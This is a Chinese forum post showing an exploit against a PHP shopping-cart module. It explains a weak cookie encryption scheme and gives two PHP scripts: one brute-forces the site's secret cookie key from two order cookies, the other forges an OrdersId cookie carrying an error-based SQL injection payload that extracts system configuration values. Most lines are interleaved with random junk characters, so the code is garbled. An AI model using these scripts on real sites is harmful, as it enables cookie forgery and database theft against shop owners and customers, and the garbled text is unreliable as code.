www.xxx.com/plus/search.php?keyword=
5 }' b D, ]- j% d! e5 T+ X在 include/shopcar.class.php中, _+ U; L c% b+ P
先看一下这个shopcar类是如何生成cookie的
. n3 v7 f& C; I) {239 function saveCookie($key,$value)/ S! t' l; Q m
240 {
8 S! Z* n( s! W241 if(is_array($value))+ b1 o. i0 m7 i( f
242 {
3 r$ P2 P7 S9 D7 ~243 $value = $this->enCrypt($this->enCode($value));) W% J8 r2 T" h$ r; i; l- b
244 }
* Z5 Y/ r1 U" V; [" S% W245 else
" v6 P, ?/ L* j7 c$ Y: Q `' b) B# e246 {" i7 x- K, Y/ M1 O. M- W5 i& i- U$ g
247 $value = $this->enCrypt($value);! k9 w R6 E+ p3 |
248 }$ [$ A) a1 @( i
249 setcookie($key,$value,time()+36000,’/');) g2 Y5 w( a& N1 {2 I5 ]" g
250 }3 u8 H. {/ c+ B: T
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数* Z2 a+ x5 @) E
186 function enCrypt($txt)3 r4 D- f! {0 V8 N' w+ d$ A
187 {
- D. ]& k% s1 ~& |) ]0 z* h# J8 l" w188 srand((double)microtime() * 1000000);0 u$ f- a! @$ m: O C& H& g, Z7 V
189 $encrypt_key = md5(rand(0, 32000));
; d- ~$ i; k' U J7 }190 $ctr = 0;5 a7 S) f I. T* p
191 $tmp = ”;
: u+ G _4 {' A, R# K& k+ A192 for($i = 0; $i < strlen($txt); $i++)% O/ C" i% ^& D2 G6 H: h
193 {- u; ~% Y$ E& Q2 d0 _
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;0 g. @8 a0 l2 ]4 ~! t
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);$ ~" U3 V2 E" k$ e9 U
196 }
# R4 l6 Y" \: r" h& T197 return base64_encode($this->setKey($tmp));
$ L# B- x/ c: d/ j( e198 }5 ~3 M0 X3 V d1 N/ U {
213 function setKey($txt)
6 ~4 L; g7 W* N3 [0 ]5 c8 L4 ~$ V214 {
3 ]: Y e9 m" d2 ?4 n3 x# f215 global $cfg_cookie_encode;
3 |, S2 B) D6 K! Q6 C$ Y216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
$ M+ X6 V9 K, l% S5 f/ [217 $ctr = 0;/ ?( S; r! s1 @9 c9 e
218 $tmp = ”;4 o8 b1 x& m q1 M0 B
219 for($i = 0; $i < strlen($txt); $i++); Y$ B0 x: ?+ c. S8 p6 M3 ?. b. L
220 {" x5 e9 R$ q; O. j) s/ q4 t5 F, g
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;! D: G5 G- s% Z+ r
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
& A" R" C e; c3 b. J223 }
! b; M x5 \2 X224 return $tmp;
+ m6 j) h/ C4 u1 B225 }
% N; J7 z1 a, [3 V# D0 a0 penCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的 n$ {8 j* R9 D8 m- D
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。+ ^" u" `7 Y( R% u% C& P
具体代码如下:
9 p ^* I' H- ?, R1 |1 p<?php
9 t$ ?; v6 w* U K ^7 o1 E2 [/ g$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here8 e+ Y/ a. t1 m1 D7 ]- B8 B& z
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
* N( e" t$ O' K" G0 _$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
. H$ ]: B' H( q2 v4 k6 jfunction reStrCode($code,$string)( ^9 o7 U- W/ D: S6 g
{# I* R; ]' {( `
$code = base64_decode($code);5 N( i' n- ]6 x7 R+ `' z7 R
$key = “”;
4 T: ^: |- L+ C. ^for($i=0 ; $i<32 ; $i++)
* e% Y+ E. _+ }{
" _7 q, q) H! q$ j# @4 v: [6 L. S$key .= $string[$i] ^ $code[$i];
& \9 P; B( G& J M}
) s8 z5 |7 f M9 a8 U5 j) ~return $key;& U/ R7 q0 B, r, f. [' H
}
# r+ l( u7 \! J% ?& p! Ffunction getKeys($cookie,$plantxt)
; a7 z( W) l ]2 o6 P. d{) Y1 X4 _$ N, U# z
$tmp = $cookie;
8 v$ n4 ` h$ O( k3 m) _" D$results = array();
% O6 |) Q% S- X7 R1 @% @ ? t% B' zfor($j=0 ; $j < 32000; $j++)! T9 D. s3 ?: }6 ~' v
{
" T8 q, `# A! a) g0 ` \; l. ~& W" `' D' _! ^! |
$txt = $plantxt;0 ]8 `" G& i* N" a2 v8 m8 l
$ctr = 0;
, ^2 g$ b7 J, ^& A8 O) D5 }$tmp = ”;1 j0 U8 g1 ^. {# S: n5 z* a @& L
$encrypt_key = md5($j);
: L3 M O. C0 @" t9 ]' U! f4 ffor($i =0; $i < strlen($txt); $i ++)# `; E, b( c/ `/ d) X. l
{& k: z1 ~# ]8 ?. a" X, x" d2 N! n& |
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
. U4 b$ Q5 o# W. b, y* B$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
1 R9 p2 s0 v- e# _, [}
# F% e: p$ b: D2 z, L0 C$string = $tmp;0 Q' h4 g6 H+ S
$code = $cookie;; H. d3 k$ K3 A% w
$result = reStrCode($code,$string);, o) Y) r+ q$ @8 m
if(eregi(‘^[a-z0-9]+$’,$result))
3 I( N1 ?& v) I& @0 X{
' }# r: N3 {9 e& f' I# M# mecho $result.”\n”;5 d% M9 T/ `$ C* {% N' ~
$results[] = $result;8 h( S7 @' c* t8 f+ L
}
5 }+ w, \$ D, `3 W6 B( Y}8 M. i7 z4 Q3 K: }1 \
return $results;
% q5 ^! L" {+ q6 m {% t}6 r J/ B* B& p
$results1 = getKeys($cookie1,$plantxt);! J# I4 m7 f5 [
$results2 = getKeys($cookie2,$plantxt);2 y( C. q/ c G8 A) {; J
print “\n——————–real key————————–\n”;" |4 f5 T! s4 P [' d9 J! E6 {6 d
foreach($results1 as $test1)
6 C4 D2 i7 c( Y, @0 R, J1 G) c/ S{7 I0 Z+ [- F1 W3 v! O8 a- d
foreach($results2 as $test2)
( y$ M' D6 `9 P{+ b6 ]% _' L3 b% d
if($test1 == $test2)
2 Z7 N! N! J! c" K2 w0 J{; G7 t5 F0 ?! H* C5 }5 Q7 y' Z) r- s. S
echo $test1.”\n”;
( \/ l9 a( q4 O. K& ^* ~; G}* u* k9 }# }4 ]( X. v
}# ?& b* d/ c" X/ k. v9 M. x
}/ R" N w" h @( E8 J
?>$ g/ m! Z2 h" I' H" C$ c
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
' W4 {+ o2 C2 K% y( E0 fplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
l7 M2 z) U# d- m& ]9 M% r然后推算出md5(strtolower($cfg_cookie_encode)). u. B, w* E/ r9 w) x- R* b2 {" D
得到这个key之后,我们就可以构造任意购物车的cookie
/ p- W$ \- q" O7 U6 g; W接着看
+ ?% Q2 a# h6 r6 `* s" J20 class MemberShops
% z5 _ Z$ [' Q% `& H$ C21 {' t# w. h5 i5 T6 u
22 var $OrdersId;
' k% T+ P& O) J( S# g23 var $productsId;1 y) H; n8 l; g- S$ y
24
& K3 f. w/ m7 R( i- Y0 O25 function __construct()
) {' s# Z2 P0 P$ \0 ^26 {; Z& I$ h( k0 E9 ?
27 $this->OrdersId = $this->getCookie(“OrdersId”);7 b+ g9 {3 a# p( Q/ A+ k/ z! o: q$ K7 e7 J
28 if(empty($this->OrdersId)). r6 X. ]$ A1 w9 E9 o( v4 @4 p' z
29 {
( X* z# z# l: r6 i+ `$ A5 C30 $this->OrdersId = $this->MakeOrders();5 r" A& C; m8 R% v v$ N7 w' E4 e' h: ~
31 }
; l* O& ]# J: H. _: b; N# ~$ _+ j* o: o32 }
' x+ [2 O3 j; j, E发现OrderId是从cookie里面获取的/ ?7 \9 \ ]0 p* K
然后% j' R; X7 f4 D& e2 R) x3 {0 B" V
/plus/carbuyaction.php中的
5 I; r, |8 U# g, @2 Y8 L( Z! E29 $cart = new MemberShops();
' W1 x! l# J7 c2 Q/ Y39 $OrdersId = $cart->OrdersId; //本次记录的订单号
. H, {/ t2 [" \( M' L# l- P……
2 X6 ]9 u- K! I, s) ^173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″); T \5 n$ [8 K! L/ @
接着我们就可以注入了
2 l% q% e3 Y9 y6 t' w通过利用下面代码生成cookie:
( x0 \% v- A4 U1 n- T/ @. h<?php# B, O) l, A+ w; S/ u& g
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;! r1 p- \; f- ?$ ^/ n
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
! H; B# n$ ~& W8 Sfunction setKey($txt)
6 z; w( Y+ [0 I9 P{
5 d* \* y5 m; g& Wglobal $encrypt_key;
0 |" n; o+ e6 N0 e' J$ctr = 0;
9 H5 ]/ w9 ]4 E( f$tmp = ”;: u9 E4 k9 H+ P
for($i = 0; $i < strlen($txt); $i++)
" k, c2 h: x8 u{
% H, p! h7 ~% R" s2 M3 O$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
. `$ y; o( V5 P- \& F$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];: } b& P! j% v/ V8 w
}2 l' X5 I8 p3 Z- D$ x. `5 }
return $tmp;
! O8 o! U1 J6 S# k}
9 g& `+ z1 `, m- I) X$ ?! zfunction enCrypt($txt)
# [7 j" s0 R; K& R7 K, l{- S/ |1 k7 Z" d. d
srand((double)microtime() * 1000000);
+ W. k0 l7 j4 m9 E$encrypt_key = md5(rand(0, 32000));
2 u$ m; t9 D' ~$ D$ X- l$ctr = 0;
6 `6 C) M+ K* ^( ?& s# a# D, Z; w$tmp = ”;
5 e7 x6 \- p Y( z* N; c1 ifor($i = 0; $i < strlen($txt); $i++)6 b8 r: J# U; F0 b' C. a# P" M
{- D3 Q2 i! D2 U3 z: A
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;. Y9 W/ h0 c( ]6 X4 [
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 t V2 v4 s& N$ n; C}1 g; B6 L; X3 n, q2 R+ V
return base64_encode(setKey($tmp));
' U% U f: D( ~# u( @* g# S/ _}
* h8 m. T. C1 U7 L$ Ifor($dest =0;$dest = enCrypt($txt);)! y# O" @8 {" V; r8 U1 l6 m
{4 L6 K7 P" A1 y) m3 D
if(!strpos($dest,’+'))
8 u" d O! |% a, H: N$ Z: C{" X! S$ X( ^0 q' K# P; T- Y( H: J
break;5 N. V4 G* Q* s N( ]. a4 R: Z& [8 ~8 o: E
}
+ \4 R0 `- f" o) R# {% u; v}
. [2 G/ N% u. u4 v5 J% Hecho $dest.”\n”;
/ A( i8 h1 L0 R7 k?>2 U6 ?8 L6 u; i7 o+ G+ e
$ }, E. ~7 I+ L: x5 \2 {
|
发表于 2013-2-13 23:58:29
收藏
支持
反对